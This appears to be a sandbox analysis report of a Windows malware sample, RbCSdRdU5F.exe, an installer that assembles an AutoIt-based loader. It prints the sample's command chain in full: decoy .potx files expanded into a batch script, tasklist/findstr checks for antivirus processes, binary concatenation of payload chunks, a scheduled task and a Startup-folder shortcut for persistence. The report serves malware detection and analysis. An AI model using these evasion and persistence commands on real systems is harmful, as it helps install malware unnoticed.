Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Code function: 0_2_00406850 FindFirstFileW,FindClose, | 0_2_00406850 |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Code function: 0_2_0040290B FindFirstFileW, | 0_2_0040290B |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Code function: 0_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, | 0_2_00405C26 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_0019A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 26_2_0019A087 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_0019A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 26_2_0019A1E2 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_0018E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, | 26_2_0018E472 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_0019A570 FindFirstFileW,Sleep,FindNextFileW,FindClose, | 26_2_0019A570 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_0015C622 FindFirstFileExW, | 26_2_0015C622 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_001966DC FindFirstFileW,FindNextFileW,FindClose, | 26_2_001966DC |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_00197333 FindFirstFileW,FindClose, | 26_2_00197333 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_001973D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, | 26_2_001973D4 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_0018D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 26_2_0018D921 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_0018DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 26_2_0018DC54 |
Source: RbCSdRdU5F.exe | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04 |
Source: Fault.com, 00000012.00000003.1358487438.0000000003E31000.00000004.00000800.00020000.00000000.sdmp, Food.14.dr, Fault.com.6.dr, InnoMesh.com.18.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0 |
Source: Fault.com, 00000012.00000003.1358487438.0000000003E31000.00000004.00000800.00020000.00000000.sdmp, Food.14.dr, Fault.com.6.dr, InnoMesh.com.18.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0 |
Source: Fault.com, 00000012.00000003.1358487438.0000000003E31000.00000004.00000800.00020000.00000000.sdmp, Food.14.dr, Fault.com.6.dr, InnoMesh.com.18.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G |
Source: Fault.com, 00000012.00000003.1358487438.0000000003E31000.00000004.00000800.00020000.00000000.sdmp, Food.14.dr, Fault.com.6.dr, InnoMesh.com.18.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c |
Source: Fault.com, 00000012.00000003.1358487438.0000000003E31000.00000004.00000800.00020000.00000000.sdmp, Food.14.dr, Fault.com.6.dr, InnoMesh.com.18.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G |
Source: RbCSdRdU5F.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 |
Source: RbCSdRdU5F.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 |
Source: RbCSdRdU5F.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z |
Source: RbCSdRdU5F.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0 |
Source: RbCSdRdU5F.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# |
Source: RbCSdRdU5F.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# |
Source: RbCSdRdU5F.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0# |
Source: RbCSdRdU5F.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0# |
Source: RbCSdRdU5F.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError |
Source: RbCSdRdU5F.exe | String found in binary or memory: http://ocsp.comodoca.com0 |
Source: Fault.com, 00000012.00000003.1358487438.0000000003E31000.00000004.00000800.00020000.00000000.sdmp, Food.14.dr, Fault.com.6.dr, InnoMesh.com.18.dr | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C |
Source: RbCSdRdU5F.exe | String found in binary or memory: http://ocsp.sectigo.com0 |
Source: RbCSdRdU5F.exe | String found in binary or memory: http://ocsp.sectigo.com01 |
Source: Fault.com, 00000012.00000003.1358487438.0000000003E31000.00000004.00000800.00020000.00000000.sdmp, Food.14.dr, Fault.com.6.dr, InnoMesh.com.18.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V |
Source: Fault.com, 00000012.00000003.1358487438.0000000003E31000.00000004.00000800.00020000.00000000.sdmp, Food.14.dr, Fault.com.6.dr, InnoMesh.com.18.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306 |
Source: Fault.com, 00000012.00000003.1358487438.0000000003E31000.00000004.00000800.00020000.00000000.sdmp, Food.14.dr, Fault.com.6.dr, InnoMesh.com.18.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr606 |
Source: Fault.com, 00000012.00000003.1358487438.0000000003E31000.00000004.00000800.00020000.00000000.sdmp, Food.14.dr, Fault.com.6.dr, InnoMesh.com.18.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08 |
Source: Fault.com, 00000012.00000003.1358487438.0000000003E31000.00000004.00000800.00020000.00000000.sdmp, Food.14.dr, Fault.com.6.dr, InnoMesh.com.18.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0 |
Source: Fault.com, 00000012.00000003.1358487438.0000000003E31000.00000004.00000800.00020000.00000000.sdmp, Fault.com, 00000012.00000000.1350579090.00000000007F5000.00000002.00000001.01000000.00000008.sdmp, InnoMesh.com, 0000001A.00000000.1383465549.00000000001F5000.00000002.00000001.01000000.0000000A.sdmp, InnoMesh.com, 0000001F.00000000.1498397898.00000000001F5000.00000002.00000001.01000000.0000000A.sdmp, Namely.14.dr, Fault.com.6.dr, InnoMesh.com.18.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/X |
Source: RbCSdRdU5F.exe | String found in binary or memory: https://sectigo.com/CPS0 |
Source: Fault.com, 00000012.00000003.1358487438.0000000003E31000.00000004.00000800.00020000.00000000.sdmp, Food.14.dr, Fault.com.6.dr, InnoMesh.com.18.dr | String found in binary or memory: https://www.autoitscript.com/autoit3/ |
Source: InnoMesh.com.18.dr | String found in binary or memory: https://www.globalsign.com/repository/0 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744 |
Source: unknown | Network traffic detected: HTTP traffic on port 49766 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49769 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49773 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49772 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49771 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49770 |
Source: unknown | Network traffic detected: HTTP traffic on port 49767 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49773 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49769 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49768 |
Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49767 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49766 |
Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49765 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49763 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49761 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49760 |
Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49770 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49759 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49757 |
Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49756 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755 |
Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49754 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750 |
Source: unknown | Network traffic detected: HTTP traffic on port 49761 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49765 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49768 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748 |
Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745 |
Source: unknown | Network traffic detected: HTTP traffic on port 49771 -> 443 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_00148017 | 26_2_00148017 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_0013E144 | 26_2_0013E144 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_0012E1F0 | 26_2_0012E1F0 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_0015A26E | 26_2_0015A26E |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_001422A2 | 26_2_001422A2 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_001222AD | 26_2_001222AD |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_0013C624 | 26_2_0013C624 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_0015E87F | 26_2_0015E87F |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_001AC8A4 | 26_2_001AC8A4 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_00192A05 | 26_2_00192A05 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_00156ADE | 26_2_00156ADE |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_00188BFF | 26_2_00188BFF |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_0013CD7A | 26_2_0013CD7A |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_0014CE10 | 26_2_0014CE10 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_00157159 | 26_2_00157159 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_00129240 | 26_2_00129240 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_001B5311 | 26_2_001B5311 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_001296E0 | 26_2_001296E0 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_00141704 | 26_2_00141704 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_00141A76 | 26_2_00141A76 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_00129B60 | 26_2_00129B60 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_00147B8B | 26_2_00147B8B |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_00141D20 | 26_2_00141D20 |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_00147DBA | 26_2_00147DBA |
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com | Code function: 26_2_00141FE7 | 26_2_00141FE7 |
Source: unknown | Process created: C:\Users\user\Desktop\RbCSdRdU5F.exe "C:\Users\user\Desktop\RbCSdRdU5F.exe" | |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Panic.potx Panic.potx.bat & Panic.potx.bat | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\expand.exe expand Panic.potx Panic.potx.bat | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 70410 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Apple.potx | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "ALIGN" Installation | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 70410\Fault.com + Contains + Faith + Trackback + Yang + Podcasts + Leaving + Newport + Searched + Accepts + Namely + Food 70410\Fault.com | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Nsw.potx + ..\Army.potx + ..\Administrative.potx + ..\Calculations.potx + ..\Simultaneously.potx + ..\Closely.potx + ..\Nationwide.potx + ..\Ton.potx J | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\70410\Fault.com Fault.com J | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5 | |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Messaging" /tr "wscript //B 'C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js'" /sc minute /mo 5 /F | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Messaging" /tr "wscript //B 'C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js'" /sc minute /mo 5 /F | |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & echo URL="C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & exit | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com" "C:\Users\user\AppData\Local\TechMesh Dynamics\Q" | |
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com" "C:\Users\user\AppData\Local\TechMesh Dynamics\Q" | |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Panic.potx Panic.potx.bat & Panic.potx.bat | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\expand.exe expand Panic.potx Panic.potx.bat | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn" | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 70410 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Apple.potx | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "ALIGN" Installation | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 70410\Fault.com + Contains + Faith + Trackback + Yang + Podcasts + Leaving + Newport + Searched + Accepts + Namely + Food 70410\Fault.com | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Nsw.potx + ..\Army.potx + ..\Administrative.potx + ..\Calculations.potx + ..\Simultaneously.potx + ..\Closely.potx + ..\Nationwide.potx + ..\Ton.potx J | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\70410\Fault.com Fault.com J | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5 | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Messaging" /tr "wscript //B 'C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js'" /sc minute /mo 5 /F | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\70410\Fault.com | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & echo URL="C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & exit | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Messaging" /tr "wscript //B 'C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.js'" /sc minute /mo 5 /F | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com" "C:\Users\user\AppData\Local\TechMesh Dynamics\Q" | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.com" "C:\Users\user\AppData\Local\TechMesh Dynamics\Q" | |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: propsys.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: dwmapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: oleacc.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: shfolder.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: iconcodecservice.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: windowscodecs.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: riched20.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: usp10.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: msls31.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: textinputframework.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: coreuicomponents.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: coremessaging.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: wintypes.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: textshaping.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: edputil.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: appresolver.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: bcp47langs.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: slc.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: sppc.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
Source: C:\Users\user\Desktop\RbCSdRdU5F.exe | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\expand.exe | Section loaded: cabinet.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll | Jump to behavior |
